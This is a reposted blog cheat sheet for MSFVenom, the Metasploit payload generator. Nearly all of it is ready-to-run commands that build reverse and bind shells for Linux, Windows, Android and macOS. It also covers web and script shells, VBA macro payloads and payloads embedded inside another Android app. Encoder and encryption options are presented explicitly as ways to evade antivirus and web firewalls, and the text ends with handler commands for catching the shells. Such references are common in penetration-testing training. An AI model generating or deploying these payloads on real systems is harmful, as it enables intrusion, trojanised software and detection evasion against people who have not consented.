Disclaimer: This is a clone of the article – https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/. All credits go to the author of the article. The website was not working, and I wanted to preserve the information for the infosec community.
MSFVenom Cheat Sheet – Easy way to create Metasploit Payloads
August 30, 2020 by J. Jogal
I included the most useful MSFVenom commands in this MSFVenom cheat sheet. MSFVenom is a payload generator for Metasploit. You can generate payloads for MSFConsole or Meterpreter. MSFVenom is the successor version of MSFPayload or its replacement of the same.
All the useful commands and one-liners are described in this MSFVenom cheat sheet. (MSFVenom is an improved version of MSFPayload. If you will try commands with MSFPayload, the terminal will give error “msfpayload: command not found”.)
Table of contents
TOC
MSFVenom Cheat Sheet
List all available MSFVenom payloads
Meterpreter Reverse Shells
Linux Reverse Shells
Windows Reverse Shells
Android Reverse Shells
macOS Reverse Shells
Meterpreter Bind Shells
Linux Bind Shell
Windows Bind Shell
macOS Bind Shell
Meterpreter Web Payloads
PHP Meterpreter Reverse Shells
Java JSP Meterpreter Reverse TCP
ASP Meterpreter Reverse TCP
WAR Payload Shells
Scripting Payloads
Bash Unix Reverse Shell
Python Reverse Shell
Perl Unix Reverse shell
WAF and Antivirus Detection(AV) Bypass using MSFVenom Encoders
List all the Encoder types
List Payload Options
List all Platforms
List all Payload Formats
Output Payload Architecture
List all the archs
Payloads with Encryptions
List of Encrypt methods
How to Use these Paylaods in MSFConsole
FAQs
Final Words,
Reference,MSFVenom Cheat Sheet
List all available MSFVenom payloads
Here I described the most useful MSFVenom commands and payloads in this MSFVenom cheat sheet. You can list all the payloads using the following command.
$ msfvenom -l payloads
Framework Payloads (562 total) [--payload ]
==================================================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
apple_ios/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
linux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
linux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
nodejs/shell_reverse_tcp Creates an interactive shell via nodejs
osx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect, read length, read buffer, execute
php/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection
php/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
python/meterpreter/bind_tcp Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection
python/meterpreter/reverse_http Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP
ruby/shell_reverse_tcp Connect back and create a command shell via Ruby
windows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)
windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
windows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
...Here we will consider,
LHOST = 10.10.10.10, RHOST = 12.12.12.12, LPORT = 4545
Meterpreter Reverse Shells
Linux Reverse Shells
# x86
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf
# x64
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf
# x86 Reverse HTTP
$ msfvenom -p linux/x86/meterpreter_reverse_http LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf
# x64 Reverse HTTP
$ msfvenom -p linux/x64/meterpreter_reverse_http LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elfWindows Reverse Shells
# x86 normal
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe
# x64 (CMD Single Stage)
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe
# reverse HTTP
$ msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe
# reverse HTTPS
$ msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe
# Powershell Payload
$ msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4545 > shell.bat
# Macro Payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f vbaAndroid Reverse Shells
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 R > shell.apk
# Android Embed Payload with another apk
$ msfvenom -x anyApp.apk android/meterpreter/reverse_tcp lhost=10.10.10.10 lport=4545 -o shell.apk
# Reverse HTTP
$ msfvenom -p android/meterpreter/reverse_http LHOST=10.10.10.10 LPORT=4545 R > shell.apk
# Reverse HTTPS
$ msfvenom -p android/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=4545 R > shell.apkmacOS Reverse Shells
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f macho > shell.macho
# Reverse TCP Shellcode
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f < platformMeterpreter Bind Shells
Linux Bind Shell
# x86 (multi stage)
$ msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=12.12.12.12 LPORT=4545 -f elf > shell.elf
# x64 (single stage)
$ msfvenom -p linux/x64/shell_bind_tcp RHOST=12.12.12.12 LPORT=4545 -f elf > shell.elfWindows Bind Shell
$ msfvenom -p windows/meterpreter/bind_tcp RHOST=12.12.12.12 LPORT=4545 -f exe > bind.exe
# Hidden Bind TCP Payload
$ msfvenom -p windows/shell_hidden_bind_tcp RHOST=12.12.12.12 LPORT=4545 -f exe > hidden_shell.exemacOS Bind Shell
$ msfvenom -p osx/x86/shell_bind_tcp RHOST=12.12.12.12 LPORT=4545 -f macho > shell.machoMeterpreter Web Payloads
PHP Meterpreter Reverse Shells
$ msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4545 -f raw > shell.php
# PHP Meterpreter Reverse TCP
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f raw > shell.php
$ cat shell.php | pbcopy && echo ‘<?php ' | tr -d '\n'> shell.php && pbpaste >> shell.phpJava JSP Meterpreter Reverse TCP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f raw > shell.jspASP Meterpreter Reverse TCP
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f asp > shell.aspWAR Payload Shells
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f war > shell.warScripting Payloads
Bash Unix Reverse Shell
$ msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=4545 -f raw > shell.shPython Reverse Shell
$ msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4545 -f raw > shell.pyPerl Unix Reverse shell
$ msfvenom -p cmd/unix/reverse_perl LHOST=10.10.10.10 LPORT=4545 -f raw > shell.plWAF and Antivirus Detection(AV) Bypass using MSFVenom Encoders
The normal MSFVenom generated payloads can be easily detectable by most of the antivirus software or firewalls. MSFVenom provides one functionality called, Encoders which can be used to bypass some of them Firewalls and Antivirus software. You can take advantage of some of them for AV bypass and WAF bypass. Use -e flag to use the same with any encoder name. Encoder types are also described in the below section.
$ msfvenom --platform Windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=10.10.10.10 LPORT=4545 -f exe > encoded_shell.exe
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytesHere -i flag is used to specifying the number of iterations. Use max possible numbers to make the payload undetectable to antivirus software(AV) and WAFs.
List all the Encoder types
You can list all the encoder types available in msfvenom using –list flag with encoders option.
$ msfvenom --list encoders
Framework Encoders [--encoder ]
======================================
Name Rank Description
---- ---- -----------
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Bourne ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR EncoderAmong these, “x86/shikata_ga_nai” is the most useful and excellent polymorphic XOR addictive encoder.
List Payload Options
Here I described the most useful MSFVenom command to view the detailed description of the payload in this MSFVenom cheat sheet. Refer to the detailed view before generating the payload which will give an idea about the payload. Use flag –list-options for the same.
# msfvenom -p PAYLOAD --list-options
$ msfvenom -p linux/x86/meterpreter/reverse_tcp --list-options
Options for payload/linux/x86/meterpreter/reverse_tcp:
=========================
Name: Linux Mettle x86, Reverse TCP Stager
Module: payload/linux/x86/meterpreter/reverse_tcp
Platform: Linux, Linux
Arch: x86
Needs Admin: No
Total size: 245
Rank: Normal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Inject the mettle server payload (staged). Connect back to the
attacker
Advanced options for payload/linux/x86/meterpreter/reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugLevel 0 yes Set debug level for meterpreter 0-3 (Default output is strerr)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that executes: if (fork()) { exit(0); }
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
RemoteMeterpreterDebugFile no Redirect Debug Info to a Log File
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion options for payload/linux/x86/meterpreter/reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------List all Platforms
You can specify the platform for the payload using –platform flag. Choose any of the following for your target system for the payload generation. In this MSFVenom cheat sheet, I specified the methods to view all the available options to choose from, which will help you to get more ideas about the uses of MSFVenom.
$ msfvenom --list platforms
Framework Platforms [--platform ]
========================================
Name
----
aix
android
apple_ios
brocade
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknown
windows
List all Payload Formats
Choose any of the following for the output format of the payload. Specify –format with the option any from below when generating the payload.
$ msfvenom --list formats
Framework Executable Formats [--format ]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format ]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscriptOutput Payload Architecture
You can specify the framework architecture for the payload using the archs available in this MSFVenom cheat sheet. Use -a to specify the arch for the output payload.
$ msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
List all the archs
$ msfvenom --list archs
Framework Architectures [--arch ]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarch
Payloads with Encryptions
You can encrypt the payloads using some of the encryption methods available in MSFVenom. Use –encrypt flag to make the payload encrypted or encoded. You can also make the payload undetectable by the AVs and WAFs by encrypting the payload.
$ msfvenom --encrypt aes256 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
List of Encrypt methods
$ msfvenom --list encrypt
Framework Encryption Formats [--encrypt ]
================================================
Name
----
aes256
base64
rc4
xorHow to Use these Payloads in MSFConsole
You can get the connect to the target machine using msfconsole and metasploit handler.
# msfconsole commands
msf> use exploit/multi/handler
msf> set PAYLOAD
msf> set RHOST
msf> set LHOST
msf> set LPORT
msf> exploit -jFAQs
What is MSFVenom?
MSFVenom is a payload generator for Metasploit. You can generate payloads for MSFConsole or Meterpreter. MSFVenom is the successor version of MSFPayload or its replacement of the same.
How to use MSFVenom?
MSFVenom can create many types of payloads using its various types of flags and filters. You can create payloads for any OS, Any architecture, Web payloads, etc. Basic command, “msfvenom -a x86 –platform Windows –encrypt aes256 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe”. Here is an MSFVenom cheat sheet article that describes all the use cases of MSFVenom.
What is an Encoder in MSFVenom?
The normal MSFVenom generated payloads can be easily detectable by most of the antivirus software or firewalls. MSFVenom provides one functionality called, Encoders which can be used to bypass some of them Firewalls and Antivirus software. You can take advantage of some of them for AV bypass and WAF bypass. Use -e flag to use the same with any encoder name.
Final Words,
This MSFVenom cheat sheet is open for everyone to share the knowledge, so share it with your friends, colleagues, and others so they can also get the help from it to generate Metasploit payloads easily.
Also, Find the another related article, Reverse Shell Cheat sheet
